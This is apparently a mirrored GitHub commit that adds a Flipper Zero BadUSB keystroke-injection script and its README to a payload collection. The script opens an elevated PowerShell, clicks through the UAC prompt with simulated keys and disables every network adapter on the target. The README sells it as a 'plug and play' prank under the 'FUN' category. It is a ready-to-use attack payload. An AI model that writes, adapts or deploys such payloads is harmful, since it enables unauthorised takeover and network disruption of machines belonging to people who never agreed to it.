mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 21:01:29 +00:00
Adding lost UNC0V3R3D BadUSB Collection
This commit is contained in:
+20
@@ -0,0 +1,20 @@
|
||||
REM Author: UNC0V3R3D
|
||||
REM Description: Uses the device manager to deactivate all networkadapters.
|
||||
REM Version: 1.0
|
||||
REM Category: FUN
|
||||
DELAY 800
|
||||
GUI r
|
||||
DELAY 800
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
DELAY 800
|
||||
ENTER
|
||||
DELAY 800
|
||||
LEFTARROW
|
||||
DELAY 800
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Get-NetAdapter | ForEach-Object { Disable-NetAdapter -Name $_.Name -Confirm:$false }
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING exit
|
||||
ENTER
|
||||
+32
@@ -0,0 +1,32 @@
|
||||
# Deactivate_Networkadapters
|
||||
Uses the device manager to deactivate all networkadapters.
|
||||
|
||||
## How to use?
|
||||
|
||||
This script is plug and play.
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- open device manager (powershell)
|
||||
- deactivate adapters
|
||||
|
||||
|
||||
## Feedback
|
||||
|
||||
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Support
|
||||
|
||||
For support, contact me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
## Meta
|
||||
|
||||
|
||||
- If you want to sponsor me on Patreon, the link is on my profile.
|
||||
Reference in New Issue
Block a user